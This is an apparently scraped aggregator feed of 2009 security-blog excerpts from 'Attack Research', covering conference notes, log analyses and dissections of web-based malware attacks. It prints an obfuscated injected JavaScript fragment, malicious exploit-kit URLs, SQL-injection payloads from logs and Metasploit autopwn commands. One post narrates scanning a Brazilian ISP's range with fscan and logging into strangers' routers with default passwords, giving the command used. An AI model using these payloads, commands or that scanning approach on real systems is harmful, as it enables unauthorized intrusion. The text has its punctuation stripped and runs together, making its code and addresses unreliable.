http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-04-29 23:29:17 - Attack Research : So we are being continually pounded by russian and chinese blog spamI almost have enough material now for another talk Keep it cominguysAlso Colin and I received our feedback from Blackhat DC and I'm happyto say we did very well up above the 90% satisfaction mark This isthe best rating i've ever received on any presentation I've beeninvolved in giving Thanks to all those that reviewed our presentationand we hope to keep up and continue this standard of quality in thefutureread morehttp://www.secuobs.com/revue/news/90226.shtmlhttp://www.secuobs.com/revue/news/90226.shtml Secuobs.com : 2009-04-15 03:58:42 - Attack Research - So on Sat, 04/11/2009 - 22:57 a post was made to AR titled: dfhfghgfIt was Submitted by Acrombrow whose email address is:daxydiateerie@mailru and whose IP address is: 195224099This is the text of the post:read morehttp://www.secuobs.com/revue/news/83429.shtmlhttp://www.secuobs.com/revue/news/83429.shtml Secuobs.com : 2009-04-09 04:37:42 - Attack Research - Full article click hereAutomatic credential collection and storage with CredCollectread morehttp://www.secuobs.com/revue/news/81332.shtmlhttp://www.secuobs.com/revue/news/81332.shtml Secuobs.com : 2009-03-28 19:35:37 - Attack Research - So doing my usual digging for malware I came across this spam emailcontaining a request to install their new CA cert so that they couldstart issuing end user certs Very kind of themNorthern Trust Corporation Warning:Beginning March 17, 2009, the Northern Trust Business Passport Centerwill use a new Certification Authority CA to issue end-usercertificatesIf no one in your organization has a digital certificate, you willneed to download your primary digital certificate fileInstallation is quick and simpleread morehttp://www.secuobs.com/revue/news/76345.shtmlhttp://www.secuobs.com/revue/news/76345.shtml Secuobs.com : 2009-03-14 03:53:03 - Attack Research - Dinners, Drinks, and conversation with:Stacey, Dildog, Weld, Dino, Tam, Sotirov, FreakOut, Whitetras, JoseNazario, Lenny Zeltser, cg, Vince, Colin, Dave Kerb, Marty Roesch,Kaminsky, Jennifer, Travis Goodspeed, Courtnee, drwho, Carrie, Jamie,slow, Ero, Nico, Dan Guido, and many many moreThis conference was excellent, it was small and many of the attendeeswere researchers You could spend time meeting and talking to peoplewithout constantly being mobbed by others I saw some of the besttalks I've ever seen, to include:Jose Nazario on Political DDOSread morehttp://www.secuobs.com/revue/news/71067.shtmlhttp://www.secuobs.com/revue/news/71067.shtml Secuobs.com : 2009-03-11 17:14:43 - Attack Research - There are many different tools available to attackers Tools likeMetasploit, exploits at Milworm, and even tools like nessus focus onexploiting a single vulnerability getting one machine on the networkWhile this is all well and good, and these are excellent tools, theylack the ability to organize a complete effective attackI have been working on the idea of making both the attack and defenceof networks more like an RTS game I kept saying I wanted to make thetool before writing this, but I have been working on the tool on andoff for 3-4 years, and I am not getting younger So I figured I wouldbrain dump, and if someone with more time than I gets to work on it,great, I'll kick myself for not finishing, but that's liferead morehttp://www.secuobs.com/revue/news/70141.shtmlhttp://www.secuobs.com/revue/news/70141.shtml Secuobs.com : 2009-03-07 19:06:39 - Attack Research - WARNING THESE LINKS ARE MALICIOUSOk several sites hosting malware deployment Might be part of thetornado kit, unsurewsxhostnet/countphpo=2 is the first, but it appears broken Itwants you to redirect off to http://20273576/tomi/t=2 whichdoesn't appear to do anythingThe next site is http://do21net/cv/countphpo=3 This site deploysat least 3 exploits that I can find, probably morehttp://do21net/cv/countphpo=4script var donn=Array63/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/*0*/,0/read morehttp://www.secuobs.com/revue/news/68397.shtmlhttp://www.secuobs.com/revue/news/68397.shtml Secuobs.com : 2009-03-07 04:06:17 - Attack Research - Dumping memory with MDD using Meterpreteradapted from: http://pauldotcomcom/wiki/indexphp/Episode142ManTech Memory DD MDD http://wwwmantechcom/msma/MDDasp isreleased under GPL by Mantech International MDD is capable of copyingthe complete contents of memory on the following Microsoft OperatingSystems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008ServerAfter downloading MDD from the Mantech site you need to run theprogram at the command lineMDD Command Line Usage:mdd -o OUTPUTFILENAMEExample:read morehttp://www.secuobs.com/revue/news/68341.shtmlhttp://www.secuobs.com/revue/news/68341.shtml Secuobs.com : 2009-03-07 04:06:17 - Attack Research - Now that we have our dd image locally you can utilize instructionsfrom http://forensiczoneblogspotcom/2009/01/using-volatility-1htmlto grab the passwords out of memoryVolatility -- https://wwwvolatilesystemscom/default/volatilityread morehttp://www.secuobs.com/revue/news/68340.shtmlhttp://www.secuobs.com/revue/news/68340.shtml Secuobs.com : 2009-02-22 21:48:42 - Attack Research - Fresh from the logs , CHAR based attacks against our dear little blog"GET/nsortaspnsort_id=598etsort_id=143%20And%20char124%2bSelect%20CastCount1%20as%20varchar8000%2Bchar124%20From%20sysobjects%20Where%201=10"GET/viewsaspnsort_id=546ethw_id=25978etsort_id=195'%20And%20char124%2bSelect%20CastCount1%20as%20varchar8000%2Bchar124%20From%20sysobjects%20Where%201=10%20and%20''='read morehttp://www.secuobs.com/revue/news/64058.shtmlhttp://www.secuobs.com/revue/news/64058.shtml Secuobs.com : 2009-02-20 02:33:04 - Attack Research - Blackhat DC is about to wrap up and the AR team had a great time TheDC crowd is significantly smaller than Vegas which makes it easier toconnect with people and not be overwhelmed by the numbersWe got to see some old friends and meet some new and awesome peopleHighlights for me were David Litchfield and Adam Laurie's talksLitchfield did some crazy pile of slides full of hex bytes and turnedit into a useful oracle forensics tool Laurie was very entertainingand is doing some cool stuff tracking sattilited Even more impressivewas his RFID man in the middle attackread morehttp://www.secuobs.com/revue/news/63422.shtmlhttp://www.secuobs.com/revue/news/63422.shtml Secuobs.com : 2009-02-15 00:06:20 - Attack Research - February 16-19 some of the AR team and HD Moore will be in DC at theHyatt Regency Crystal city Regan National AirportFirst up, HD and I will teach our Tactical Exploitation class soldout This class will focus on breaking into computers withoutexploits, profiling your targets, trust relationships and moreThen on the 19th, Colin Ames and I will be talking about dissectingweb based attacks Colin and I took apart two attacks, one coming fromRussia and one coming from China that use web technologies to pushmalware and exploits to visitors of trusted websites We track one ofthem back to the attacker's home DSL IP in Russia because of somemistakes he made in his MPACK installation We completely dissect hiswhole infrastructure including domains, IP's, links, RE the malware,etcNext we tear apart an interesting Chinese attack This one focuses oninjecting a tiny piece of code into trusted site, such as equipmentvendors, which redirects users to a spider web of malicious sites inthe background They take advantage of SQL injection, maliciousgraphics files, 0day browser exploits and heavily obfuscatedjavascript Several of the things they do provide evidence that theyare indeed from China and we will reveal the details of theirtechniquesA lot of these types of attacks have been around for a long time, butrarely are the details so fully understood or explained in the depththat we are going to provideI hope to see you thereVread morehttp://www.secuobs.com/revue/news/61944.shtmlhttp://www.secuobs.com/revue/news/61944.shtml Secuobs.com : 2009-02-10 04:52:26 - Attack Research - If you are having problems reaching http://wwwattackresearchcom thisis because for several days we have been under a DDOS attack which wastargeted at the Metasploit server as well as several other highprofile security websites Temporarily you can reach the site viahttp://wwwattackresearchcom:8000 thanks HDMHD Moore has posted significant details on his BlogThanks for your patience, and thanks to the attackers for giving usmore attacks to talk aboutVhttp://www.secuobs.com/revue/news/60234.shtmlhttp://www.secuobs.com/revue/news/60234.shtml Secuobs.com : 2009-02-10 03:08:48 - Attack Research - In the last installment of fans or foes, we were able to identify anumber of FQDNs that had been pointed to the AR blog This time aroundwe will answer the age old question " Why not do something about it "First off, we filtered through the logs to find referrer entries thatgave away our uninvited guests In order to make things a littleeasier to spot the current and future offending FQDNs We will do thisby creating a new log file that only logs referrer informationread morehttp://www.secuobs.com/revue/news/60191.shtmlhttp://www.secuobs.com/revue/news/60191.shtml Secuobs.com : 2009-02-05 04:32:18 - Attack Research - Binary packers are notoriously known to be used alongside maliciouscode Although there is a legimate use for them, not everyone iswilling to take the risk I have been researching a method ofdetecting the binary signature of a file within the network streamwithout extracting the binary itself Currently, I have been able todevelop a snort rule set that I translated straight from PEiDsignatures with a python script I wrote The only drawback, is thatsnort can not use wildcard bytes whereas PEiD doesread morehttp://www.secuobs.com/revue/news/58674.shtmlhttp://www.secuobs.com/revue/news/58674.shtml Secuobs.com : 2009-01-28 00:46:31 - Attack Research - After reading what Valsmith posted about other FQDNs being pointed toAR, i decided to do some research myselfLet's go to the logsA typical web log entry looks something like this 666666666666 - - 27/Jan/2095:04:23:10 -0900 "GET /q=user/666HTTP/11" 200 6062 "http://blogattackresearchcom/" "Mozilla/50Windows; U; Windows NT 60; en-US; rv:1905 Gecko/2008120122Firefox/305" Note : All log entries are modified slightly, as you can tell Nosoft intel here read morehttp://www.secuobs.com/revue/news/55740.shtmlhttp://www.secuobs.com/revue/news/55740.shtml Secuobs.com : 2009-01-24 07:22:44 - Attack Research - HD Moore and I are offering a Tactical Exploitation course forBlackHat DC on February 16th and 17th This two-day course introducesa tactical approach that does not rely on exploiting knownvulnerabilities Using a combination of new tools and lesser-knowntechniques, students will learn how to compromise systems withoutdepending on standard exploits This course is limited to a smallnumber of seats less than 15 and we only have few spots left Forexamples of the types of things this course covers, please see ouroriginal Black Hat slides and the first half of our Defcon talkread morehttp://www.secuobs.com/revue/news/54799.shtmlhttp://www.secuobs.com/revue/news/54799.shtml Secuobs.com : 2009-01-23 14:25:03 - Attack Research - #/usr/local/bin/rubyif ARGVlength == 0puts "Usage: ft value"puts "ft = from / to = b||o||d||h"puts "ie from octal to binary: ob"exit 0endif ARGVlength 2puts "2 inputs"exit 0endft = ARGV0to_si = ARGV1result = case ftwhen "bo": ito_ibase=2to_sbase=8when "bd": ito_ibase=2to_sbase=10when "bh": ito_ibase=2to_sbase=16when "ob": ito_ibase=8to_sbase=2when "od": ito_ibase=8to_sbase=10when "oh": ito_ibase=8to_sbase=16when "db": ito_ibase=10to_sbase=2read morehttp://www.secuobs.com/revue/news/54469.shtmlhttp://www.secuobs.com/revue/news/54469.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - This is a continuation of the post "Dissecting a Multistage Web Attackthat uses IE7 0day"As we mentioned in the previous part of this series, we saw variousattackers from China trying SQLi against this victim Here is anexample of the attacks they attempted:2008-12-01 08:17:22 W3SVC864329 WEB1 1921681victimipGET /vuln3asp ID=145'%20and%20char124%2Buser%2Bchar124=0%20and%20''='80 - 12311184170 HTTP/11 Internet+Explorer+60 - - wwwvictimcom 302 0 0 521 140 390read morehttp://www.secuobs.com/revue/news/51842.shtmlhttp://www.secuobs.com/revue/news/51842.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - This is a continuation of the post "Dissecting a Multistage Web Attackthat uses the recent IE7 0Day"So at this point we know how the attackers got command and control andtheir code onto the victim website, and we know how they are directingvisitors to their malicious web page But what happens once they are there The source code of thejavascript gives us a starting point for clues:document write " " ; ^Mdocument write " " ; ^Mread morehttp://www.secuobs.com/revue/news/51841.shtmlhttp://www.secuobs.com/revue/news/51841.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - So I was doing a little vanity googling and came across somethingrather weird in the results:#Attack Research | Defense Is DeadValsmith decided to found this site after leaving Offensive Computing with a simple malware analysis into the larger world of total attack research wwwcntradecitycom/ - 15k - Cached - Similar pages -#Attack ResearchAttack Research Soon | valsmith@metasploitcom | wwwcntradeshopcom/ - 1k - Cached - Similar pages -#Attack ResearchAttack Research Soon | valsmith@metasploitcom |read morehttp://www.secuobs.com/revue/news/51840.shtmlhttp://www.secuobs.com/revue/news/51840.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - Or maybe its just the common stuff that goes on all the time I'vegotten upwards of 40,000 SSH attempts from China in the last couple ofdaysExample:Jan 5 06:52:08 ubuntu sshd20254: Failed password for invalid user fabia from 116725586 port 36768 ssh2Jan 5 06:52:09 ubuntu sshd20256: Invalid user fabienne from 116725586Jan 5 06:52:09 ubuntu sshd20256: pam_unixsshd:auth: check pass; user unknownJan 5 06:52:09 ubuntu sshd20256: pam_unixsshd:auth: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116725586read morehttp://www.secuobs.com/revue/news/51839.shtmlhttp://www.secuobs.com/revue/news/51839.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - ^M windowonerror=function{return true;}^Mevalfunctionp,a,c,k,e,d{e=functionc{returnc35StringfromCharCodec+29:ctoString36};if''replace/^/,String{whilec--{dec=kc||ec}k=functione{returnde};e=function{return'\w+'};c=1};whilec--{ifkc{p=preplacenewRegExp'\b'+ec+'\b','g',kc}}returnp}'1d=\'1y://1z1x1w/1u/1AQ\';N=\'151B \';R=\'151D\';k=1C"d"+"o"+"c"+"u"+"m"+"e"+"n"+"t""c"+"r"+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+"e"+"n"+"t""o"+"b"+"j"+"e"+"c"+"t";read morehttp://www.secuobs.com/revue/news/51838.shtmlhttp://www.secuobs.com/revue/news/51838.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - This is a continuation of the post "Dissecting a Multistage Web Attackthat uses the recent IE7 0Day" At the end of the previous post we sawthe attackers were delivering an IE 07 exploits Now we will take astep back and look at what else they are doing First, regardless ofwhether or not the browser is running IE they send the browser to twoIFRAMES 14htm and flashhtmread morehttp://www.secuobs.com/revue/news/51837.shtmlhttp://www.secuobs.com/revue/news/51837.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - So I'm curious is anyone else seeing any interesting attacksOne thing that seems to be very common is SSH brute forcing A lot ofit coming from China of course Italy and Romania Obviously havingcomplex passwords is a good idea but what about lockouts The attacksI've seen try a bunch of different user names but also root Lockoutswould be a good self DoS but windows has them for regular usersWhat I really want to know is, what do these SSH brute forcers do oncethey get in Anyone hit successfully by this its ok, you can admitit, we promise we won't make fun of you :read morehttp://www.secuobs.com/revue/news/51836.shtmlhttp://www.secuobs.com/revue/news/51836.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - When I was playing around with MSF MetaSploit Framework, I wanted totry out more with the “autopwn” function For those who do not knowhow it works, here is the standard command-set that I use for it:load db_sqlite3db_destroydb_createdb_nmap -vv iprange1-254 with maybe some other arguments you likeThen it uses nmap to scan the IP-addresses, and adds them to thesqlite3 database Once the scan is finished, you can see the resultsby using:db_hostsThis will output all the IP-addresses that are added to the databaseand will also give you information about a possible OS running on thesystemThe following command that I usually do, is obviously the autopwnfunction Like this:db_autopwn -p -t -eEnough about that, let's get back to the subject that I really want totalk about hereSo I decided to go wild, and googled for some Brasillian IP-range,which in this case was “20122183x” Once I started the nmap scan,with only the -vv option and the ip-range “201221831-254” Quicklythere was a lot of output on my screen with IP-addresses that had port80 open on that range I decided to visit one in my browser and foundout it was locked with a username and password I saw “DSL Router” init, so I gave “admin / admin” a shot, with success, I was in and hadaccess to the routerSo I tried some more, and came across different kinds of routers, andeven camera systemsI reminded myself that I downloaded a HTTP Auth Scanner a few daysago, that uses the standard passwords such as “admin / admin”, “tech /tech”, “root / root” etc The scanner is called “fscan”, or “Fast HTTPAuth Scanner v06” More information and a download link can be foundhere:http://www514es/2007/07/fast_http_auth_scannerhtmlObviously I could not wait to give this a try, so I started up cmd onmy laptop, and started the scanner But now I did the complete c-classrange, so 20122 Here is the command I used:fscanexe --ports 80 --hosts 2012211-20122255254 –threads 100I did not really expect that much, but there was more vulnerable thanexpected Very much IP-addresses on the range had port 80 open withtheir router software externally accessable for everyone who had thepassword or who, like me in this case, tried a tiny bruteforce on itwith standard passwordsHere is the result of fscanexe:http://pastebincom/m4c5cdba5As you can see, this is pretty shocking, in some weird kind of wayRemember this is only one ISP/IP-range that has been scanned and I ampretty sure there are a lot of these out there Maybe I will try tofind more, however I am not using it for other things than knowledgeSome routers can be programmed in some way that they can execute orhost things, or if you change certain things in the routers you couldprobably even access the connected computers easily Imagine having afew computers scanning IP-ranges like this, and using them for thebad~KLread morehttp://www.secuobs.com/revue/news/51835.shtmlhttp://www.secuobs.com/revue/news/51835.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - After noticing val's post on his vanity search he Googles no this isnot a verb ; himself a lot doesn't he I thought 'who what' <- iknow this guy in china no not reallyread morehttp://www.secuobs.com/revue/news/51834.shtmlhttp://www.secuobs.com/revue/news/51834.shtml Secuobs.com : 2009-01-15 21:25:23 - Attack Research - I posthttp://wwwcntradeshopcom/ is well lets see why yes its updatedwith my storywhich leads me to believe thata 112252347 is using that happy fun MITM thinglets seehttp://71616774/ cntradeshopcomip based yes its AR o_O71616774 cntradeshopcomHEAD / HTTP/10HTTP/11 400 Bad RequestDate: Wed, 14 Jan 2009 16:30:19 GMTServer: Apache/228 Ubuntu PHP/524-2ubuntu54 with Suhosin-PatchX-Powered-By: PHP/524-2ubuntu54Connection: closeContent-Type: text/htmlubuntu suhosin patch6624021381 ARHEAD / HTTP/10read morehttp://www.secuobs.com/revue/news/51833.shtmlhttp://www.secuobs.com/revue/news/51833.shtml